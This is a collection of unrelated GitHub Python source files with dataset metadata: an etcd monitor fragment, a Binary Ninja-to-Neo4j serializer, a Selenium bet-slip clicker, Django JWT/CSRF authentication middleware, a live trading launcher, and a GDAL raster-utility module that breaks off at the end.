    def event_test(msg):
        # Debug handler bound to the 'test' event in monitor_start/worker_start.
        print('test event %s' % msg)
    async def monitor_start(self, monitor, exec=None):
        """Bind debug events and attach an etcd client before the monitor starts."""
        monitor.bind_event('test', self.event_test)
        # Use default etcd connection unless an 'etcdconf' dict is configured.
        if not hasattr(self.cfg, 'etcdconf'):
            monitor.etcd = etcd.Client()
        else:
            monitor.etcd = etcd.Client(**self.cfg.etcdconf)
        await super().monitor_start(monitor)
    async def worker_start(self, worker, *args, **kwargs):
        worker.bind_event('test', self.event_test)
    async def search_remote(self):
        # Not implemented yet.
        pass
    async def sync_remote(self):
        # Not implemented yet.
        pass
| RyanKung/jirachi | jirachi/io/remote/monitor.py | monitor.py | py | 2,379 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "pulsar.apps.wsgi.Router",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "hashlib.sha1",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pulsar.get_actor",
... |
35260765665 | from binaryninja import *
import xxhash
################################################################################################################
# MLIL Instruction #
################################################################################################################
class Neo4jInstruction:
    """Wraps a Binary Ninja MLIL instruction for export as a Neo4j node plus
    the relationship linking it to its parent (basic block or prior instruction)."""

    def __init__(self, instr: mediumlevelil.MediumLevelILInstruction, context, parent_type: str):
        self.instr = instr
        self.parent_type = parent_type
        self.operands = str(instr.operands)
        self.context = context
        # The first instruction of a basic block starts a chain; any other
        # parent means we are continuing one.
        self.relationship_label = (
            'InstructionChain' if parent_type == 'BasicBlock' else 'NextInstruction'
        )
        self.context.set_hash(self.instr_hash())

    def instr_hash(self):
        """Digest of operands + operation, identifying structurally identical instructions."""
        digest = xxhash.xxh64()
        digest.update(str(self.instr.operands) + str(self.instr.operation))
        return digest.hexdigest()

    def serialize(self):
        """Return the CSV-import template describing this node and its parent edge."""
        ctx = self.context
        return {
            'mandatory_node_dict': {
                'HASH': ctx.SelfHASH,
                'LABEL': 'Instruction',
            },
            'mandatory_relationship_dict': {
                'START_ID': ctx.ParentHASH,
                'END_ID': ctx.SelfHASH,
                'TYPE': self.relationship_label,
                'StartNodeLabel': self.parent_type,
                'EndNodeLabel': 'Instruction',
                'AssemblyOffset': self.instr.address,
            },
            'mandatory_context_dict': ctx.get_context(),
            'node_attributes': {
            },
            'relationship_attributes': {
                'InstructionIndex': self.instr.instr_index,
                'PossibleValues': self.instr.possible_values.type.value,
                'VarsRead': [v.name for v in self.instr.vars_read],
                'VarsWritten': [v.name for v in self.instr.vars_written],
            },
        }
| CySHell/Binja4J | Core/extraction_helpers/Instruction.py | Instruction.py | py | 2,116 | python | en | code | 15 | github-code | 36 | [
{
"api_name": "xxhash.xxh64",
"line_number": 25,
"usage_type": "call"
}
] |
30473232781 | from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from tkinter import messagebox
import time
import os
from App.Login import username, password, security_question
class Core:
    """Drives the bet-selection flow: read a bet file, click the matching
    checkboxes on the page via Selenium, and add the selection to the slip."""
    def __init__(self, file_path, driver):
        self.driver = driver
        self.file_path = file_path
        self.file_content = self.readFileContent()
        self.file_name = os.path.split(file_path)[1]
        self.IDs_list = []
        if self.file_content:
            try:
                self.collectCheckboxsIDs()
                self.selectCheckbox()
            except NoSuchElementException:
                # Page did not match expectations (slow load or layout change).
                self.driver.close()
                messagebox.showinfo(
                    "Bet Selector", "Loading took too much time or Not yet defined.")
        else:
            messagebox.showinfo(
                "Bet Selector", "Your Bet File '{}' is Empty.".format(self.file_name))
    def readFileContent(self):
        """Return the bet file's non-empty lines as a list of strings."""
        with open(self.file_path, 'r') as f:
            file_content = f.read().split('\n')
            file_content = list(filter(None, file_content))
            return file_content
    def collectCheckboxsIDs(self):
        """Collect checkbox element ids, chunked into rows of 9, with a dummy
        row 0 and dummy column 0 so the file's 1-based digits index directly."""
        checkboxs = self.driver.find_elements_by_class_name("checkbox")
        IDs_list = []
        for el in checkboxs:
            IDs_list.append(el.get_attribute('id'))
        # Chunk into rows of 9 checkboxes each (page layout assumption).
        IDs_list = [IDs_list[x:x+9] for x in range(0, len(IDs_list), 9)]
        IDs_list.insert(0, [])
        for lis in IDs_list:
            lis.insert(0, "")
        self.IDs_list = IDs_list
    def selectCheckbox(self):
        """Click the checkboxes encoded by each comma-separated line of the
        bet file, then click 'Add to Slip' per line."""
        for line in self.file_content:
            line = line.split(',')
            row = 1
            for choice in line:
                i = 0
                while i < len(choice):
                    # Each digit in *choice* is a 1-based column in this row.
                    self.driver.find_element_by_id(
                        self.IDs_list[row][int(choice[i])]).click()
                    i += 1
                row += 1
            self.driver.find_element_by_xpath(
                '//*[@title="Add to Slip"]').click()
| abdlalisalmi/UpWork-Select-Checkbox-in-a-Web-Page-with-Python-Selenium | App/Core.py | Core.py | py | 2,090 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.split",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "selenium.common.exceptions.NoSuchElementException",
"line_number": 25,
"usage_type": "name"
},
{
"api_... |
30990966321 | # need to implement CSRF
from rest_framework.authentication import CSRFCheck
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework import exceptions
from channels.db import database_sync_to_async
from server.settings import SIMPLE_JWT
from django.core.exceptions import ObjectDoesNotExist
from rest_framework_simplejwt.tokens import UntypedToken, TokenError
from urllib.parse import parse_qs
from server.settings import SIMPLE_JWT, SECRET_KEY
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
import jwt
def enforce_csrf(request):
    """Run Django's CSRF machinery against *request*; raise PermissionDenied on failure."""
    csrf_check = CSRFCheck()
    csrf_check.process_request(request)
    failure_reason = csrf_check.process_view(request, None, (), {})
    if failure_reason:
        raise exceptions.PermissionDenied('CSRF failed: %s' % failure_reason)
class CustomAuthentication(JWTAuthentication):
    """JWT authentication that falls back to the auth cookie and enforces CSRF."""

    def authenticate(self, request):
        header = self.get_header(request)
        if header is not None:
            raw_token = self.get_raw_token(header)
        else:
            # No Authorization header: look for the JWT in the configured cookie.
            raw_token = request.COOKIES.get(SIMPLE_JWT['AUTH_COOKIE']) or None
        if raw_token is None:
            return None
        validated = self.get_validated_token(raw_token)
        enforce_csrf(request)
        return self.get_user(validated), validated
@database_sync_to_async
def get_user(user_id):
    """Fetch the user by primary key off the event loop; AnonymousUser if absent."""
    try:
        return get_user_model().objects.get(pk=user_id)
    except ObjectDoesNotExist:
        return AnonymousUser()
class TokenAuthMiddleWare:
    """Channels middleware: resolve ``scope['user']`` from a ``?token=`` JWT
    query parameter, falling back to AnonymousUser on any failure."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        # Sentinel id that cannot match a real user, so lookup failures yield
        # AnonymousUser via get_user().
        user_id = -1
        try:
            # query_string arrives as bytes, e.g. b"token=abc".
            raw_token = parse_qs(scope["query_string"].decode("utf8"))["token"][0]
            UntypedToken(raw_token)  # raises TokenError when invalid/expired
            # NOTE(review): PyJWT >= 2 expects ``algorithms`` as a list; confirm
            # the installed version tolerates a bare string here.
            decode_token = jwt.decode(raw_token, SECRET_KEY, SIMPLE_JWT["ALGORITHM"])
            user_id = decode_token['user_id']
        # Was a bare ``except:`` — that also swallowed SystemExit/CancelledError.
        except Exception:
            print("Token is invalid")
        finally:
            user = await get_user(user_id)
            return await self.app(dict(scope, user=user), receive, send)
| Kredam/MyRoom | back-end/server/api/authentication.py | authentication.py | py | 2,167 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "rest_framework.authentication.CSRFCheck",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "rest_framework.exceptions.PermissionDenied",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "rest_framework.exceptions",
"line_number": 20,
"usage_... |
15969653865 | #!/usr/bin/env python
## Test an algorithm in real life
import sys
# Bail out early on unsupported interpreters (features below require >= 3.6).
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
    print("This script requires Python version >=3.6")
    sys.exit(1)
import algorithms
import datetime
import exchange
import pandas_market_calendars as mcal
import portfolioLive
## Main function
def main():
    """Run the KIPP strategy against a live portfolio, but only on NYSE trading days."""
    today = datetime.date.today()
    nyse = mcal.get_calendar('NYSE')
    # valid_days is empty when today is a weekend or an exchange holiday.
    if len(nyse.valid_days(start_date=today, end_date=today)) == 0:
        print("Markets are closed today")
        return
    # One symbol per line; drop trailing blank lines.
    with open("symbolsPruned", "r", newline="\n") as file:
        symbols = file.read().strip().split("\n")
    exchange.init(
        symbols,
        period=1,
        historyDays=algorithms.KIPPslowDays)
    p = portfolioLive.Portfolio()
    algorithms.KIPP(symbols, p)
if __name__ == "__main__":
    main()
| WattsUp/PyStonks | stonks/live.py | live.py | py | 810 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.date",
... |
13346852826 | from osgeo import gdalnumeric
from osgeo import osr
from osgeo import gdal
from osgeo.gdal_array import *
from osgeo.gdalconst import *
from PIL import Image
import pylab as P
import os
import numpy as np
from IPython.core.debugger import set_trace
def readData(filename, ndtype=np.float64):
    '''
    z=readData('/path/to/file')
    Read a raster file into a numpy array of dtype *ndtype*.
    '''
    if os.path.isfile(filename):
        return LoadFile(filename).astype(ndtype)
    # BUG FIX: gdal.Dataset's method is ReadAsArray (capital R); the original
    # ``readAsArray`` raised AttributeError, and the dtype was never applied.
    return gdal.Open(filename, gdal.GA_ReadOnly).ReadAsArray().astype(ndtype)
def writeTiff(ary, coord, filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64, lon=None, lat=None, nodata=None, grid=False, cog=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', options=[], gcps=None):
    '''writeTiff(ary, geoTransform, filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64, lon=None, lat=None)
    Write *ary* to a GeoTIFF.
    ary: 2D (rows, cols) or 3D (rows, cols, bands) array.
    coord: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution];
        pass None (with lon/lat arrays) to least-squares fit a geotransform.
    rescale: [min max]: If given rescale ary values between min and max.
    grid: resample scattered lon/lat samples onto a regular grid first.
    cog: write a cloud-optimized GeoTIFF (tiled, LZW, with overview pyramids).
    gcps: list of gdal.GCP, or a pair of ints giving a GCP grid size (needs lon/lat).
    '''
    if coord is None and gcps is None:
        import scipy
        import scipy.linalg
        # Fit an affine geotransform to every ~10th pixel's lon/lat by least squares.
        s = [sk // 10 for sk in ary.shape]
        ary10 = ary[::s[0], ::s[1]]
        lon10 = lon[::s[0], ::s[1]]
        lat10 = lat[::s[0], ::s[1]]
        A = np.ones([np.multiply(*ary10.shape), 3])
        line, pixel = np.meshgrid(np.r_[0:ary.shape[0]:s[0]], np.r_[0:ary.shape[1]:s[1]])
        A[:, 1] = pixel.ravel()
        A[:, 2] = line.ravel()
        xlon = np.dot(scipy.linalg.pinv(A), lon10.ravel())
        xlat = np.dot(scipy.linalg.pinv(A), lat10.ravel())
        coord = [xlon[0], xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]]
        print(coord)
    if grid:
        import scipy.interpolate
        # Resample scattered samples onto a regular lon/lat grid (cubic).
        LON, LAT = np.meshgrid(np.r_[lon.min():lon.max():abs(coord[1])], np.r_[lat.max():lat.min():-abs(coord[5])])
        ary = scipy.interpolate.griddata(np.array([lon.ravel(), lat.ravel()]).T, ary.ravel(), (LON, LAT), method='cubic')
        coord = [LON[0, 0], abs(coord[1]), 0, LAT[0, 0], 0, -abs(coord[5])]
        print(coord)
    if rescale:
        import basic
        ary = basic.rescale(ary, rescale)
    if ary.ndim == 2:
        Ny, Nx = ary.shape
        Nb = 1
    elif ary.ndim == 3:
        # Band-last layout on purpose (deviates from GDAL's band-first ReadAsArray).
        Ny, Nx, Nb = ary.shape
    else:
        print("Input array has to be 2D or 3D.")
        return None
    driver = gdal.GetDriverByName("GTiff")
    if cog:
        options = ["TILED=YES", "COMPRESS=LZW", "INTERLEAVE=BAND", "BIGTIFF=YES"]
    ds = driver.Create(filename, Nx, Ny, Nb, gdal.GDT_Float64, options)
    srs = osr.SpatialReference()
    srs.ImportFromProj4(srs_proj4)
    ds.SetProjection(srs.ExportToWkt())
    # Georeference with either the affine transform or explicit GCPs.
    if gcps is None:
        ds.SetGeoTransform(coord)
    else:
        if type(gcps[0]) == gdal.GCP:
            ds.SetGCPs(gcps, srs.ExportToWkt())
        # BUG FIX: ``np.int`` was removed in numpy >= 1.24 (use plain int), and
        # the list was built as ``gcps_list`` but passed as the undefined name
        # ``gcp_list`` (NameError).
        elif isinstance(gcps[0], int) and len(gcps) == 2 and lat is not None:
            gcp_list = create_gcp_list(lon, lat, np.zeros(lat.shape), gcp_count=[gcps[0], gcps[1]])
            ds.SetGCPs(gcp_list, srs.ExportToWkt())
        else:
            print('unsupported type of GCPs. Skipping.')
    if nodata is not None:
        ds.GetRasterBand(1).SetNoDataValue(nodata)
    if Nb == 1:
        ds.GetRasterBand(1).WriteArray(ary)
    else:
        for b in range(Nb):
            ds.GetRasterBand(b + 1).WriteArray(ary[:, :, b])
    if cog:
        # Overview pyramids are required for a valid COG.
        ds.BuildOverviews("NEAREST", [2, 4, 8, 16, 32, 64, 128, 256])
    ds = None
    print("File written to: " + filename)
def create_gcp_list(x, y, z, p=None, l=None, gcp_count=[2, 2]):
    """create_gcp_list(x,y,z,p=None, l=None, gcp_count=[2,2])
    Build a list of gdal.GCP ground control points.
    If p/l are omitted, x/y/z are assumed image-shaped and *gcp_count* picks an
    evenly spaced grid of samples; otherwise p (pixel/row) and l (line/col)
    give the image position of each x/y/z sample explicitly.
    """
    gcp_list = []
    if l is None or p is None:
        rows = np.linspace(0, x.shape[0] - 1, gcp_count[0]).astype(int)
        cols = np.linspace(0, x.shape[1] - 1, gcp_count[1]).astype(int)
        for r in rows:
            for c in cols:
                gcp_list.append(gdal.GCP(x[r, c], y[r, c], z[r, c], float(r), float(c)))
    else:
        p = p.ravel().astype(float)
        l = l.ravel().astype(float)
        x, y, z = x.ravel(), y.ravel(), z.ravel()
        for k in range(l.size):
            gcp_list.append(gdal.GCP(x[k], y[k], z[k], p[k], l[k]))
    return gcp_list
def writeAny(ary, coord, fileformat="GTiff", filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64,lon=None, lat=None, nodata=None, grid=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
    '''writeAny(ary, geoTransform, format="GTiff", filename='kgiAlos.tif', rescale=None, format=gdal.GDT_Float64 ,lon=None, lat=None):
    Write *ary* to any GDAL-writable raster format (same pipeline as writeTiff,
    but with a selectable driver and no COG/GCP support).
    ary: 2D (rows, cols) or 3D (rows, cols, bands) array.
    geoTransform: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]
    format: "GTiff"
    rescale: [min max]: If given rescale ary values between min and max.
    If lon lat is specified set coord to None
    '''
    if coord is None:
        import scipy
        import scipy.linalg
        # Least-squares fit of an affine geotransform from every ~10th pixel.
        s=[sk//10 for sk in ary.shape]#BRANDON EDIT FOR COMPATIBILITY: changed / to // for python 3
        ary10=ary[::s[0],::s[1]];
        lon10=lon[::s[0],::s[1]];
        lat10=lat[::s[0],::s[1]];
        A=np.ones([np.multiply(*ary10.shape),3])
        line,pixel=np.meshgrid(np.r_[0:ary.shape[0]:s[0]],np.r_[0:ary.shape[1]:s[1]])
        A[:,1]=pixel.ravel()
        A[:,2]=line.ravel()
        xlon=np.dot(scipy.linalg.pinv(A), lon10.ravel())
        xlat=np.dot(scipy.linalg.pinv(A), lat10.ravel())
        coord=[xlon[0],xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]];
        print(coord)
    if grid:
        import scipy.interpolate
        # Resample scattered lon/lat samples onto a regular grid (cubic).
        LON,LAT=np.meshgrid(np.r_[lon.min():lon.max():abs(coord[1])], np.r_[lat.max():lat.min():-abs(coord[5])])
        ary=scipy.interpolate.griddata(np.array([lon.ravel(),lat.ravel()]).T,ary.ravel(),(LON,LAT), method='cubic');
        coord=[LON[0,0],abs(coord[1]), 0, LAT[0,0], 0,-abs(coord[5])];
        print(coord)
    if rescale:
        import basic
        ary=basic.rescale(ary, rescale);
    if ary.ndim ==2:
        Ny, Nx = ary.shape
        Nb = 1;
    elif ary.ndim==3:
        # Band-last layout (rows, cols, bands).
        Ny,Nx,Nb=ary.shape
    else:
        print("Input array has to be 2D or 3D.")
        return None
    driver = gdal.GetDriverByName(fileformat)
    ds = driver.Create(filename, Nx, Ny, Nb, gdal.GDT_Float64)
    # top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
    ds.SetGeoTransform( coord )
    srs=osr.SpatialReference()
    srs.ImportFromProj4(srs_proj4)
    ds.SetProjection(srs.ExportToWkt() );
    if nodata is not None:
        # NOTE(review): unlike writeTiff, this hard-codes the nodata value to 0
        # instead of using the ``nodata`` argument — confirm whether intended.
        ds.GetRasterBand(1).SetNoDataValue(0);
    if Nb==1:
        ds.GetRasterBand(1).WriteArray(ary)
    else:
        for b in range(Nb):
            ds.GetRasterBand(b+1).WriteArray(ary[:,:,b])
    ds = None
    print("File written to: " + filename);
def writeCSV(ary, filename='gis_file.csv', geotransform=None, rescale=None, format="%f", lon=None, lat=None, nodata=None, grid=False, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
    '''writeCSV(ary, filename='gis_file.csv', geotransform=None, rescale=None, format="%f", lon=None, lat=None)
    Dump a raster as lon,lat,value rows in a CSV file.
    ary: 2D array.
    geotransform: [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution];
        pass None (with lon/lat arrays) to least-squares fit one.
    rescale: [min max]: If given rescale ary values between min and max.
    '''
    if geotransform is None:
        import scipy
        import scipy.linalg
        # Least-squares fit of an affine geotransform from every ~10th pixel.
        s = [sk // 10 for sk in ary.shape]
        ary10 = ary[::s[0], ::s[1]]
        lon10 = lon[::s[0], ::s[1]]
        lat10 = lat[::s[0], ::s[1]]
        A = np.ones([np.multiply(*ary10.shape), 3])
        line, pixel = np.meshgrid(np.r_[0:ary.shape[0]:s[0]], np.r_[0:ary.shape[1]:s[1]])
        A[:, 1] = pixel.ravel()
        A[:, 2] = line.ravel()
        xlon = np.dot(scipy.linalg.pinv(A), lon10.ravel())
        xlat = np.dot(scipy.linalg.pinv(A), lat10.ravel())
        geotransform = [xlon[0], xlon[2], xlon[1], xlat[0], xlat[2], xlat[1]]
        print(geotransform)
    if grid:
        import scipy.interpolate
        # BUG FIX: this branch referenced the undefined name ``coord``; it must
        # use ``geotransform``.
        LON, LAT = np.meshgrid(np.r_[lon.min():lon.max():abs(geotransform[1])],
                               np.r_[lat.max():lat.min():-abs(geotransform[5])])
        ary = scipy.interpolate.griddata(np.array([lon.ravel(), lat.ravel()]).T,
                                         ary.ravel(), (LON, LAT), method='cubic')
        geotransform = [LON[0, 0], abs(geotransform[1]), 0, LAT[0, 0], 0, -abs(geotransform[5])]
        print(geotransform)
        # BUG FIX: the gridded raster must be paired with the gridded coordinates,
        # otherwise the column lengths below disagree.
        lon, lat = LON, LAT
    else:
        # Rebuild per-pixel lon/lat from the geotransform (1-based pixel indices,
        # preserved from the original implementation).
        y = np.linspace(1, ary.shape[0], ary.shape[0])
        x = np.linspace(1, ary.shape[1], ary.shape[1])
        Y, X = np.meshgrid(y, x, indexing='ij')
        lon = geotransform[0] + geotransform[1] * X + Y * geotransform[2]
        lat = geotransform[3] + geotransform[4] * X + Y * geotransform[5]
    if rescale:
        import basic
        ary = basic.rescale(ary, rescale)
    Ny, Nx = ary.shape
    item_length = Ny * Nx
    import csv
    columns = [lon.ravel(), lat.ravel(), ary.ravel()]
    # BUG FIX: Python 3's csv.writer needs a text-mode file; 'wb' raised
    # TypeError. newline='' is the documented way to open files for csv.
    with open(filename, 'w', newline='') as csv_file:
        file_writer = csv.writer(csv_file)
        for i in range(item_length):
            file_writer.writerow([col[i] for col in columns])
    print("File written to: " + filename)
def readCoord(filename, srs_proj4=None, dtype=np.float64):
    '''
    lon,lat=lonlat('/path/to/file', srs_proj4=None)
    Return full lon/lat coordinate grids (WGS84) for every pixel of the raster.
    srs_proj4 overrides the file's own projection when given.
    '''
    # http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
    # get the existing coordinate system
    xn,yn,xN,yN=corners(filename);
    ds = gdal.Open(filename)
    if srs_proj4 is None:
        old_cs=osr.SpatialReference()
        old_cs.ImportFromWkt(ds.GetProjectionRef())
    else:
        old_cs=osr.SpatialReference()
        old_cs.ImportFromProj4(srs_proj4);
    # create the new coordinate system (WGS84 geographic)
    wgs84_wkt = """
    GEOGCS["WGS 84",
        DATUM["WGS_1984",
            SPHEROID["WGS 84",6378137,298.257223563,
                AUTHORITY["EPSG","7030"]],
            AUTHORITY["EPSG","6326"]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.01745329251994328,
            AUTHORITY["EPSG","9122"]],
        AUTHORITY["EPSG","4326"]]"""
    new_cs = osr.SpatialReference()
    new_cs .ImportFromWkt(wgs84_wkt)
    # create a transform object to convert between coordinate systems
    transform = osr.CoordinateTransformation(old_cs,new_cs)
    # transform two opposite corners to lat/long
    lonn,latn,z=transform.TransformPoint(xn,yn)
    lonN,latN,z=transform.TransformPoint(xN,yN)
    # NOTE(review): assumes a north-up, rotation-free geotransform — lon/lat
    # are linearly interpolated between the two transformed corners.
    lat=np.linspace(latn,latN,ds.RasterYSize).astype(dtype);
    lon=np.linspace(lonn,lonN,ds.RasterXSize).astype(dtype);
    LON,LAT=np.meshgrid(lon,lat);
    return LON, np.flipud(LAT);
def corners(filename):
    '''
    (minx,miny,maxx,maxy)=corners('/path/to/file')
    Bounding coordinates of the raster in its own projection, derived from the
    geotransform and the raster dimensions.
    '''
    # http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
    ds = gdal.Open(filename)
    cols, rows = ds.RasterXSize, ds.RasterYSize
    x0, dx, rot_x, y0, rot_y, dy = ds.GetGeoTransform()
    min_x = x0
    max_y = y0
    min_y = y0 + cols * rot_y + rows * dy
    max_x = x0 + cols * dx + rows * rot_x
    return (min_x, min_y, max_x, max_y)
def bounding_box(filename):
    """
    ((lon1,lat1), (lon2,lat2), (lon3,lat3), (lon4,lat4))=bounding_box('/path/to/file')
    Corner coordinates (UL, UR, LR, LL) in the raster's own projection.
    """
    gT = getGeoTransform(filename)
    w, h = get_size(filename)
    pixel_corners = ((0, 0), (w, 0), (w, h), (0, h))
    return tuple(xy2coord(px, py, gT) for px, py in pixel_corners)
def xy2coord(x, y, gT):
    '''
    lon,lat=xy2coord(x,y,geoTransform)
    projects pixel index to position based on geotransform.
    Applies the affine geotransform to pixel indices (x=column, y=row).
    '''
    coord_x = gT[0] + gT[1] * x + gT[2] * y
    coord_y = gT[3] + gT[4] * x + gT[5] * y
    return coord_x, coord_y
def coord2xy(x, y, gT):
    '''
    x,y = coord2xy(lon, lat, geoTransform)
    calculates pixel index closest to the lon, lat.
    Assumes a north-up (rotation-free) geotransform; returns (row, col).
    '''
    # ref: https://gis.stackexchange.com/questions/221292/retrieve-pixel-value-with-geographic-coordinate-as-input-with-gdal/221430
    x_origin, pixel_w = gT[0], gT[1]
    y_origin, pixel_h = gT[3], -gT[5]
    col = np.array((x - x_origin) / pixel_w).astype(int)
    row = np.array((y_origin - y) / pixel_h).astype(int)
    return row, col
def getGeoTransform(filename):
    '''
    [top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution]=getGeoTransform('/path/to/file')
    '''
    # http://stackoverflow.com/questions/2922532/obtain-latitude-and-longitude-from-a-geotiff-file
    return gdal.Open(filename).GetGeoTransform()
def get_size(filename):
    """(width, height) = get_size(filename)
    Raster dimensions in pixels."""
    dataset = gdal.Open(filename)
    dims = (dataset.RasterXSize, dataset.RasterYSize)
    dataset = None  # release the GDAL handle
    return dims
def get_proj4(filename):
    """Return the raster's projection as a PROJ4 string."""
    ds = gdal.Open(filename)
    sr = gdal.osr.SpatialReference()
    # BUG FIX: GetProjectionRef is a method — the original passed the bound
    # method object itself instead of calling it.
    sr.ImportFromWkt(ds.GetProjectionRef())
    return sr.ExportToProj4()
def transformPoint(x,y,z,s_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', t_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'):
    '''
    transformPoint(x,y,z,s_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', t_srs='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
    Reproject one point (or sequences of points) between coordinate systems.
    s_srs/t_srs accept "EPSG:xxxx", a "GEOCCS..." WKT string, or a PROJ4 string.
    Known Bugs: gdal transform may fail if a proj4 string can not be found for the EPSG or WKT formats.
    '''
    from .. import base
    # Parse the source CRS from whichever of the three formats was given.
    srs_cs=osr.SpatialReference()
    if "EPSG" == s_srs[0:4]:
        srs_cs.ImportFromEPSG(int(s_srs.split(':')[1]));
    elif "GEOCCS" == s_srs[0:6]:
        srs_cs.ImportFromWkt(s_srs);
    else:
        srs_cs.ImportFromProj4(s_srs);
    # Same for the target CRS.
    trs_cs=osr.SpatialReference()
    if "EPSG" == t_srs[0:4]:
        trs_cs.ImportFromEPSG(int(t_srs.split(':')[1]));
    elif "GEOCCS" == t_srs[0:6]:
        trs_cs.ImportFromWkt(t_srs);
    else:
        trs_cs.ImportFromProj4(t_srs);
    transform = osr.CoordinateTransformation(srs_cs,trs_cs)
    if base.numel(x)>1:
        # NOTE(review): the element-wise recursion drops s_srs/t_srs and always
        # uses the defaults — confirm whether that is intended.
        return [ transformPoint(x[k], y[k], z[k]) for k in range(base.numel(x))]
    else:
        try:
            # Some GDAL versions take a tuple, others positional arguments.
            return transform.TransformPoint((x,y,z));
        except:
            return transform.TransformPoint(x,y,z)
def rsat2_export(filename, export_filename=None, yclip=225):
    """ 'export_filename'=rsat2_export(filename, export_filename=None, yclip=225)
    Export a RADARSAT-2 product to a cloud-optimized GeoTIFF in dB scale.
    yclip: number of bottom rows dropped from the raster before export.
    """
    ds=gdal.Open(filename, gdal.GA_ReadOnly)
    w=ds.RasterXSize
    h=ds.RasterYSize
    # Amplitude -> decibels.
    data=10.*np.log10(abs(ds.ReadAsArray(ysize=ds.RasterYSize-yclip)))
    gT=ds.GetGeoTransform()
    if export_filename is None:
        # Derive the output name from the source name plus the acquisition
        # start time (colons/dots stripped so it is filesystem-safe).
        timestr=''.join(ds.GetMetadata()['ACQUISITION_START_TIME'].split(".")[0].split(":"))
        export_filename='_'.join(filename.split(":")[0:2])+"_"+timestr+"_cog.tif"
    # log10(0) yields -inf; mark those as NaN nodata.
    data[data==-np.inf]=np.nan
    data[data==np.inf]=np.nan #should not be necessary
    writeTiff(data, gT, filename=export_filename, cog=True, gcps=ds.GetGCPs(), nodata=np.nan)
    return export_filename
def clip_gT(gT, xmin, xmax, ymin, ymax, method='image'):
    '''calculate new geotransform for a clipped raster either using pixels or projected coordinates.
    clipped_gT=clip_gT(gT, xmin, xmax, ymin, ymax, method='image')
    method: 'image' | 'coord'
    '''
    # NOTE(review): an unrecognized ``method`` leaves x/y unbound
    # (UnboundLocalError), and the x/y naming is swapped relative to
    # xy2coord's (x=col, y=row) order — callers such as auto_clip pass
    # row/col limits; confirm intent before changing.
    if method == 'image':
        y,x=xy2coord(ymin, xmin, gT); #top left, reference, coordinate
    if method == 'coord':
        #find nearest pixel
        yi, xi = coord2xy(ymin, xmin, gT)
        #get pixel coordinate
        y,x=xy2coord(yi, xi, gT)
    gTc=list(gT)
    gTc[0]=y
    gTc[3]=x
    return tuple(gTc)
def auto_clip(arr, gT, no_data=np.nan):
    """automatically remove the excess no-data pixels in raster. Similar to auto_clip in GIMP.
    clipped_raster, clipped_gT = auto_clip(raster, geoTransform, no_data=np.nan)
    Rows/columns are kept only when they contain more than 50 valid pixels.
    """
    if np.isnan(no_data):
        m = ~np.isnan(arr)
    else:
        m = arr != no_data
    # BUG FIX: use the explicit ``np`` alias — the bare ``numpy`` name only
    # existed as a side effect of the module's star imports.
    data_cols = np.where(m.sum(0) > 50)[0]
    data_rows = np.where(m.sum(1) > 50)[0]
    gTc = clip_gT(gT, data_rows[0], data_rows[-1], data_cols[0], data_cols[-1])
    # NOTE(review): the slice excludes the last valid row/column — kept as-is
    # to preserve existing behavior.
    arrC = arr[data_rows[0]:data_rows[-1], data_cols[0]:data_cols[-1]]
    return arrC, gTc
def translate_gT(gT, x_offset, y_offset):
    '''gT_translated=translate_gT(gT, x_offset, y_offset)
    Return a copy of the geotransform with its origin (elements 0 and 3)
    shifted by the given offsets.
    '''
    shifted = list(gT)
    shifted[0] += x_offset
    shifted[3] += y_offset
    return tuple(shifted)
def translate_tif(filename, x_offset, y_offset):
    """Shift a raster's geotransform by (x_offset, y_offset) and write the
    result to '<name>_translated.tif'; returns the output filename."""
    arr = readData(filename)
    gT = getGeoTransform(filename)
    # BUG FIX: the original called the undefined name ``gsp.connectors.gdal.
    # translate_gT``; the helper lives in this module.
    gTt = translate_gT(gT, x_offset, y_offset)
    # BUG FIX: ``filename[-4]`` is a single character — the intended slice is
    # ``filename[:-4]`` (strip the extension), matching the returned name.
    out = filename[:-4] + '_translated.tif'
    writeTiff(arr, gTt, filename=out)
    return out
def auto_clip_tif(f, no_data=np.nan):
